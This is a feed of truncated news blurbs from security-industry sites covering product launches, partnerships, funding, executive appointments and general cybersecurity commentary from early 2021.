Deploying AI-powered cybersecurity directly on drones

SparkCognition and SkyGrid announced a new collaboration to deploy AI-powered cybersecurity directly on drones, protecting them from zero-day attacks during flight. Equipped with SparkCognition’s DeepArmor cybersecurity product, SkyGrid is the first airspace management system to enable drone protection powered by AI. This approach provides more advanced airspace security than traditional anti-malware reliant on signatures of known threats. “In the near future, we’ll essentially have a network of flying computers in the sky, and just like … More

The post Deploying AI-powered cybersecurity directly on drones appeared first on Help Net Security.

Rethinking Active Directory security

In the wake of a cyberattack, Active Directory is sometimes dismissed as just another service that needs to be recovered, and security is an afterthought. But the hard reality is that if Active Directory is compromised, so is your entire environment. 90% of organizations use Active Directory as their primary store for employee authentication, identity management, and access control. Today, it’s becoming more common for organizations to take a hybrid approach to identity and focus … More

The post Rethinking Active Directory security appeared first on Help Net Security.

Are you vetting your MSSPs?

Enterprises were already moving toward digital transformations at the start of 2020, but the COVID-19 pandemic suddenly threw everything into high gear. Telework, virtual meetings and a host of online transactions – from retail purchases and food ordering to interviewing and onboarding employees – went from being occasional occurrences to being the norm. With enterprises using the cloud for more and more of their operations, the adoption of “as-a-Service” offerings has grown swiftly in nearly … More

The post Are you vetting your MSSPs? appeared first on Help Net Security.

Product showcase: Pentest Robots

Security testing automation is not about building tech to replace humans. We don’t adhere to that limiting view because it fails to capture the complexity and depth of security testing. Instead, we believe automation should enhance uniquely human abilities such as critical thinking and subjective judgment. A good pentester can never be replaced by a robot. But a robot can make them exponentially more effective. Here’s what we mean. How Pentest Robots work Security pros … More

The post Product showcase: Pentest Robots appeared first on Help Net Security.

Visibility, control and governance holding back cloud transformation

While 91% of organizations were successful in increasing security as a result of adopting cloud services, it remains a top concern for many, a part two of an Aptum study reveals. The report identifies common security, compliance and governance challenges impacting organizations undergoing cloud transformation. The research reveals that 51% of survey respondents see security as the main driver behind cloud adoption. However, 38% cite security and data protection as the primary barrier to cloud … More

The post Visibility, control and governance holding back cloud transformation appeared first on Help Net Security.

U.S. National Cybersecurity Plan Promises to Safeguard Maritime Sector

The U.S Government released on January 5, 2021, a cybersecurity plan to secure the nation’s maritime sector against cybersecurity threats that could endanger national security. The Maritime Cyber Environment With International Maritime Organization’s (IMO) mandate “to ensure that cyber risks are appropriately addressed in existing safety management systems” and the increasing number of cyber-attacks against maritime […]… Read More

The post U.S. National Cybersecurity Plan Promises to Safeguard Maritime Sector appeared first on The State of Security.

Worldwide SD-WAN market to reach valuation of $53 billion by end of 2030

A software-defined wide area network is a type of computer network that allows the bounding of multiple internet access resources, such as cables, digital subscriber lines (DSL), and cellular or any other IP transport to provide high throughput data channels. WAN solutions improve application performance, reducing costs, increasing agility, and addressing various IT challenges. Enterprises are adopting SD-WAN solutions for threat protection, efficient offloading of expensive circuits, and simplification of WAN network management. IT infrastructure … More

The post Worldwide SD-WAN market to reach valuation of $53 billion by end of 2030 appeared first on Help Net Security.

How to defend against today’s top 5 cyber threats

Cyber threats are constantly evolving. As recently as 2016, Trojan malware accounted for nearly 50% of all breaches. Today, they are responsible for less than seven percent. That’s not to say that Trojans are any less harmful. According to the 2020 Verizon Data Breach Investigations Report (DBIR), their backdoor and remote-control capabilities are still used by advanced threat actors to conduct sophisticated attacks. Staying ahead of evolving threats is a challenge that keeps many IT … More

The post How to defend against today’s top 5 cyber threats appeared first on Help Net Security.

My Office Apps Kechie 2021 ERP: Enabling quick access to business-critical information in real time

My Office Apps announced the availability of Kechie 2021 Enterprise Resource Planning (ERP) software, a cloud-based solution, enabling quick access to business-critical information in real time. The company has raised the Software as a Service (SaaS) bar by delivering innovative features to make small-to-medium sized manufacturing, distribution, and non-profit operations more productive and competitive, while increasing efficiency and effectiveness. With over thirty years of business solutions, Kechie is a proven leader in business transformation software … More

The post My Office Apps Kechie 2021 ERP: Enabling quick access to business-critical information in real time appeared first on Help Net Security.

Neurotechnology SentiVeillance 8.0 SDK: Creating identification by using live video streams

Neurotechnology announced the release of the SentiVeillance 8.0 software development kit (SDK). With SentiVeillance SDK, developers can create identification solutions that use live video streams from digital surveillance cameras or video files. The latest version adds face detection and recognition of people who are wearing masks and includes new algorithms that improve license plate detection and recognition speed and accuracy. It also provides new features for vehicle and human (VH) mode, including car make and … More

The post Neurotechnology SentiVeillance 8.0 SDK: Creating identification by using live video streams appeared first on Help Net Security.

DigiPlex signs agreement with HPE to host AI and HPC technology in its Stockholm data center

DigiPlex has signed an agreement with Hewlett Packard Enterprise (HPE) to host AI and High-Performance Computing (HPC) technology in its Stockholm data center. The DigiPlex Stockholm campus is located close to Arlanda, the capital airport of Sweden, the perfect geographical location for business needs. The multi award-winning campus runs on electricity from 100% renewable energy and offers 26,000 m² with up to 40 MW capacity which makes it attractive to businesses from a sustainability perspective. … More

The post DigiPlex signs agreement with HPE to host AI and HPC technology in its Stockholm data center appeared first on Help Net Security.

Reply and AWS develop industry solutions for different businesses

Reply announces it has signed a strategic collaboration agreement (SCA) with Amazon Web Services (AWS) to develop industry solutions for financial services, manufacturing, automotive, retail, energy, and telco customers. Through this SCA, the Reply Group of companies dedicated to AWS – Comsysto Reply, Data Reply, Sense Reply, and Storm Reply – will work with organizations of virtually all sizes and allow them to innovate faster and deliver consistent improvements on their business processes using advanced … More

The post Reply and AWS develop industry solutions for different businesses appeared first on Help Net Security.

IAR Build Tools for Linux now supported by Parasoft C/C++test

Parasoft announced its C/C++test update to support IAR Systems‘ build tools for Linux for Arm. IAR Build Tools for Linux inspired the update of Parasoft’s unified testing solution for C/C++test software development. With these tools combined, software developers gain the ability to configure fast and scalable CI/CD pipelines on Linux servers and automate the testing process. IAR Build Tools for Linux uses the leading build tools from IAR Embedded Workbench and empowers software developers who … More

The post IAR Build Tools for Linux now supported by Parasoft C/C++test appeared first on Help Net Security.

RunSafe Security and ReleaseTEAM partner to deliver more security options to DevOps clients

RunSafe Security announced a partnership with ReleaseTEAM, a full-service DevOps consulting firm. With this relationship, ReleaseTEAM delivers even more security options to its DevOps clients. “Given ReleaseTEAMS’ mission to empower customers on their DevOps journey, security was a crucial consideration for the company,” said Joe Saunders, CEO of RunSafe Security. “Alkemist was a logical fit to their portfolio and allows for a secure move from traditional software development lifecycle practices to a modern DevOps environment.” … More

The post RunSafe Security and ReleaseTEAM partner to deliver more security options to DevOps clients appeared first on Help Net Security.

DocuSign closes offering of 0% convertible senior notes due 2024 for gross proceeds of $690M

DocuSign announced that it has closed its offering of 0% convertible senior notes due 2024 for gross proceeds of $690.0 million, including the full exercise of the $90.0 million option to purchase additional notes granted by DocuSign to the initial purchasers. The notes were sold only to qualified institutional buyers pursuant to Rule 144A under the Securities Act of 1933, as amended (the “Act”). The notes are general unsecured, senior obligations of DocuSign that do … More

The post DocuSign closes offering of 0% convertible senior notes due 2024 for gross proceeds of $690M appeared first on Help Net Security.

Zluri raises $2M to expand sales, marketing, and engineering functions

Zluri announced a seed investment of $2M from Endiya Partners and Kalaari Capital. The funding will help expand sales, marketing, and engineering functions and build integrations and no-code workflow automation for SaaS applications. Founded by Sethu Meenakshisundaram, Ritish Reddy, and Chaithanya Yambari, Zluri was born out of challenges experienced first-hand by the founding team. Today, 3rd party SaaS solutions used by corporates do not follow systems or processes to manage them, leading to hidden dollar … More

The post Zluri raises $2M to expand sales, marketing, and engineering functions appeared first on Help Net Security.

CI Security appoints Steve Sedlock as CRO and Kristoffer Turner as VP of Security Operations

CI Security announced the addition of Steve Sedlock as the company’s Chief Revenue Officer (CRO) and the promotion of Kristoffer Turner to Vice President of Security Operations for the Critical Insight Security Operations Centers. “CI Security is quickly becoming the go-to resource for cyber security services and solutions in the market. With the addition of Steve Sedlock and the promotion of Kristoffer Turner, we are investing to enhance a world-class executive team,” said Garrett Silver, … More

The post CI Security appoints Steve Sedlock as CRO and Kristoffer Turner as VP of Security Operations appeared first on Help Net Security.

SAP appoints Julia White and Scott Russell to the Executive Board

SAP announced that the Supervisory Board appointed Julia White and Scott Russell to the Executive Board. White will take a new Executive Board role as chief marketing and solutions officer. Russell will head SAP’s Customer Success organization. He will succeed Adaire Fox-Martin, who has informed the Supervisory Board that she will depart the company at the end of the month. “We are very pleased to have both Julia and Scott join the Executive Board to … More

The post SAP appoints Julia White and Scott Russell to the Executive Board appeared first on Help Net Security.

Options names Kieran Northime VP of Software Development

Options has announced former NYSE Euronext executive, Kieran Northime as VP of Software Development. Kieran joins Options with three decades of experience across infrastructure, market data and software development, following roles with Wombat Financial Software, Lehman Brothers, Misys (now Finastra), and at NYSE Euronext, where he was VP of Technology, Exchange Solutions. Prior to Options, Kieran most recently founded bespoke systems solution company, Black Eye Technology. He has experience working with a wide range of … More

The post Options names Kieran Northime VP of Software Development appeared first on Help Net Security.

Raymond Brancato joins Tufin as Chief Revenue Officer

Tufin announced that Raymond Brancato has been appointed Chief Revenue Officer, reporting directly to CEO and co-founder Ruvi Kitov. In his new role, Mr. Brancato will be responsible for building on the company’s momentum by leading Tufin’s sales efforts across all products globally. Tufin’s current SVP of Global Sales, Kevin Maloney, will assist with the transition through the end of March after a tenure of five and a half years, during which time revenues tripled … More

The post Raymond Brancato joins Tufin as Chief Revenue Officer appeared first on Help Net Security.